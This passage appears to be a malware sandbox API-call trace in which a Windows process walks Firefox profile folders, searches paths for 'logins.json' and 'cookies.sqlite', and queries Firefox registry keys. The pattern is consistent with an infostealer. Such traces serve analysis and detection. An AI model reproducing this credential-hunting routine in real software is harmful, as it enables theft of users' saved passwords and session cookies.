lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="webappsstore.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" [0161.101] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.101] GetProcessHeap () returned 0x8e0000 [0161.101] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.101] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite", lpSrch="logins.json") returned 0x0 [0161.101] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.101] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.101] GetProcessHeap () returned 0x8e0000 [0161.101] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.101] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3a63b40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="webappsstore.sqlite", cAlternateFileName="WEBAPP~1.SQL")) returned 0 [0161.102] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0161.102] VirtualQuery (in: lpAddress=0x925378, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.102] GetProcessHeap () returned 0x8e0000 [0161.102] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925378 | out: hHeap=0x8e0000) returned 1 [0161.102] VirtualQuery (in: lpAddress=0x912cc0, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.102] GetProcessHeap () returned 0x8e0000 [0161.102] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912cc0 | out: hHeap=0x8e0000) returned 1 [0161.102] VirtualQuery (in: lpAddress=0x9252c0, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.102] GetProcessHeap () returned 0x8e0000 [0161.102] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c0 | out: hHeap=0x8e0000) returned 1 [0161.102] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 70 [0161.102] lstrlenW (lpString="\\") returned 1 [0161.102] GetProcessHeap () returned 0x8e0000 [0161.102] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x90) returned 0x912cc0 [0161.102] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0161.102] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0161.102] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 71 [0161.102] lstrlenW (lpString="silmbjec.default") returned 16 [0161.102] GetProcessHeap () returned 0x8e0000 [0161.102] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb0) returned 0x9252c0 [0161.102] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0161.102] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.102] VirtualQuery (in: lpAddress=0x912cc0, lpBuffer=0x2df4a8, dwLength=0x1c | out: lpBuffer=0x2df4a8*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.102] GetProcessHeap () returned 0x8e0000 [0161.102] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912cc0 | out: hHeap=0x8e0000) returned 1 [0161.102] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpSrch="logins.json") returned 0x0 [0161.102] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpSrch="cookies.sqlite") returned 0x0 [0161.102] VirtualQuery (in: lpAddress=0x9252c0, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.103] GetProcessHeap () returned 0x8e0000 [0161.103] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c0 | out: hHeap=0x8e0000) returned 1 [0161.103] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x85442390, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85442390, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="silmbjec.default", cAlternateFileName="SILMBJ~1.DEF")) returned 0 [0161.103] FindClose (in: hFindFile=0x8f9a80 | out: hFindFile=0x8f9a80) returned 1 [0161.103] VirtualQuery (in: lpAddress=0x912c20, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.103] GetProcessHeap () returned 0x8e0000 [0161.103] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912c20 | out: hHeap=0x8e0000) returned 1 [0161.103] VirtualQuery (in: lpAddress=0x926478, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.103] GetProcessHeap () returned 0x8e0000 [0161.103] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926478 | out: hHeap=0x8e0000) returned 1 [0161.103] VirtualQuery (in: lpAddress=0x912b88, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.103] GetProcessHeap () returned 0x8e0000 [0161.103] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912b88 | out: hHeap=0x8e0000) returned 1 [0161.103] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.103] lstrlenW (lpString="\\") returned 1 [0161.103] GetProcessHeap () returned 0x8e0000 [0161.103] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x80) returned 0x926478 [0161.103] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.103] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" [0161.103] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned 63 [0161.103] lstrlenW (lpString="Profiles") returned 8 [0161.103] GetProcessHeap () returned 0x8e0000 [0161.103] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x90) returned 0x912b88 [0161.103] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" [0161.103] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\", lpString2="Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\Profiles" [0161.103] VirtualQuery (in: lpAddress=0x926478, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.103] GetProcessHeap () returned 0x8e0000 [0161.103] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926478 | out: hHeap=0x8e0000) returned 1 [0161.103] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\Profiles", lpSrch="logins.json") returned 0x0 [0161.103] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\Profiles", lpSrch="cookies.sqlite") returned 0x0 [0161.103] VirtualQuery (in: lpAddress=0x912b88, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.103] GetProcessHeap () returned 0x8e0000 [0161.103] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912b88 | out: hHeap=0x8e0000) returned 1 [0161.104] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x6f, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="profiles.ini", cAlternateFileName="")) returned 1 [0161.104] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.104] lstrlenW (lpString="\\") returned 1 [0161.104] GetProcessHeap () returned 0x8e0000 [0161.104] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x80) returned 0x926478 [0161.104] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.104] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" [0161.104] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned 63 [0161.104] lstrlenW (lpString="profiles.ini") returned 12 [0161.104] GetProcessHeap () returned 0x8e0000 [0161.104] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x98) returned 0x912b88 [0161.104] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" [0161.104] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\", lpString2="profiles.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini" [0161.104] VirtualQuery (in: lpAddress=0x926478, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.104] GetProcessHeap () returned 0x8e0000 [0161.104] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926478 | out: hHeap=0x8e0000) returned 1 [0161.104] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini", lpSrch="logins.json") returned 0x0 [0161.104] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini", lpSrch="cookies.sqlite") returned 0x0 [0161.104] VirtualQuery (in: lpAddress=0x912b88, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.104] GetProcessHeap () returned 0x8e0000 [0161.104] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912b88 | out: hHeap=0x8e0000) returned 1 [0161.104] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x6f, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="profiles.ini", cAlternateFileName="")) returned 0 [0161.104] FindClose (in: hFindFile=0x8f9a40 | out: hFindFile=0x8f9a40) returned 1 [0161.104] VirtualQuery (in: lpAddress=0x9263e8, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.104] GetProcessHeap () returned 0x8e0000 [0161.104] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9263e8 | out: hHeap=0x8e0000) returned 1 [0161.104] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.104] GetProcessHeap () returned 0x8e0000 [0161.104] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0161.104] VirtualQuery (in: lpAddress=0x912d98, lpBuffer=0x2df9d4, dwLength=0x1c | out: lpBuffer=0x2df9d4*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.104] GetProcessHeap () returned 0x8e0000 [0161.105] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912d98 | out: hHeap=0x8e0000) returned 1 [0161.105] VirtualQuery (in: lpAddress=0x90a8a0, lpBuffer=0x2df9d4, dwLength=0x1c | out: lpBuffer=0x2df9d4*(BaseAddress=0x90a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.105] GetProcessHeap () returned 0x8e0000 [0161.105] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90a8a0 | out: hHeap=0x8e0000) returned 1 [0161.105] VirtualQuery (in: lpAddress=0x8fcdb8, lpBuffer=0x2df9d4, dwLength=0x1c | out: lpBuffer=0x2df9d4*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.105] GetProcessHeap () returned 0x8e0000 [0161.105] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fcdb8 | out: hHeap=0x8e0000) returned 1 [0161.105] GetProcessHeap () returned 0x8e0000 [0161.105] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x912b88 [0161.105] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", phkResult=0x2dfa10 | out: phkResult=0x2dfa10*=0x15c) returned 0x0 [0161.105] RegEnumKeyExW (in: hKey=0x15c, dwIndex=0x0, lpName=0x912b88, lpcchName=0x2dfa0c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x2dfa0c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0161.105] RegCloseKey (hKey=0x15c) returned 0x0 [0161.105] VirtualQuery (in: lpAddress=0x912b88, lpBuffer=0x2df9d4, dwLength=0x1c | out: lpBuffer=0x2df9d4*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.105] GetProcessHeap () returned 0x8e0000 [0161.105] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912b88 | out: hHeap=0x8e0000) returned 1 [0161.105] VirtualQuery (in: lpAddress=0x90a830, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x90a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.105] GetProcessHeap () returned 0x8e0000 [0161.105] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90a830 | out: hHeap=0x8e0000) returned 1 [0161.105] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x1, lpName=0x911b80, lpcchName=0x2dfa44, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Uninstall", lpcchName=0x2dfa44, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0161.105] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)") returned 45 [0161.105] lstrlenW (lpString="\\") returned 1 [0161.105] GetProcessHeap () returned 0x8e0000 [0161.105] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x5e) returned 0x90a830 [0161.105] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)" [0161.105] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", lpString2="\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\" [0161.105] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned 46 [0161.105] lstrlenW (lpString="Uninstall") returned 9 [0161.105] GetProcessHeap () returned 0x8e0000 [0161.105] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x70) returned 0x90a898 [0161.105] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\" [0161.106] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\", lpString2="Uninstall" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall") returned="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall" [0161.106] VirtualQuery (in: lpAddress=0x90a830, lpBuffer=0x2dfa00, dwLength=0x1c | out: lpBuffer=0x2dfa00*(BaseAddress=0x90a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.106] GetProcessHeap () returned 0x8e0000 [0161.106] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90a830 | out: hHeap=0x8e0000) returned 1 [0161.106] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", lpSrch="Firefox") returned="Firefox\\25.0 (en-US)\\Uninstall" [0161.106] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", ulOptions=0x0, samDesired=0x20219, phkResult=0x2df9e8 | out: phkResult=0x2df9e8*=0x15c) returned 0x0 [0161.106] RegQueryValueExW (in: hKey=0x15c, lpValueName="PathToExe", lpReserved=0x0, lpType=0x2df9ec, lpData=0x0, lpcbData=0x2df9f8*=0x0 | out: lpType=0x2df9ec*=0x0, lpData=0x0, lpcbData=0x2df9f8*=0x0) returned 0x2 [0161.106] RegCloseKey (hKey=0x15c) returned 0x0 [0161.106] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", ulOptions=0x0, samDesired=0x20119, phkResult=0x2df9c0 | out: phkResult=0x2df9c0*=0x0) returned 0x2 [0161.106] GetProcessHeap () returned 0x8e0000 [0161.106] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x912b88 [0161.106] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", phkResult=0x2dfa10 | out: phkResult=0x2dfa10*=0x15c) returned 0x0 [0161.106] RegEnumKeyExW (in: hKey=0x15c, dwIndex=0x0, lpName=0x912b88, lpcchName=0x2dfa0c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x2dfa0c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0161.106] RegCloseKey (hKey=0x15c) returned 0x0 [0161.106] VirtualQuery (in: lpAddress=0x912b88, lpBuffer=0x2df9d4, dwLength=0x1c | out: lpBuffer=0x2df9d4*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.106] GetProcessHeap () returned 0x8e0000 [0161.106] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912b88 | out: hHeap=0x8e0000) returned 1 [0161.106] VirtualQuery (in: lpAddress=0x90a898, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x90a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.106] GetProcessHeap () returned 0x8e0000 [0161.106] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90a898 | out: hHeap=0x8e0000) returned 1 [0161.106] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x2, lpName=0x911b80, lpcchName=0x2dfa44, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Uninstall", lpcchName=0x2dfa44, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0161.106] RegCloseKey (hKey=0x14c) returned 0x0 [0161.106] VirtualQuery (in: lpAddress=0x911b80, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x37000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.107] GetProcessHeap () returned 0x8e0000 [0161.107] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b80 | out: hHeap=0x8e0000) returned 1 [0161.107] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3f000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.107] GetProcessHeap () 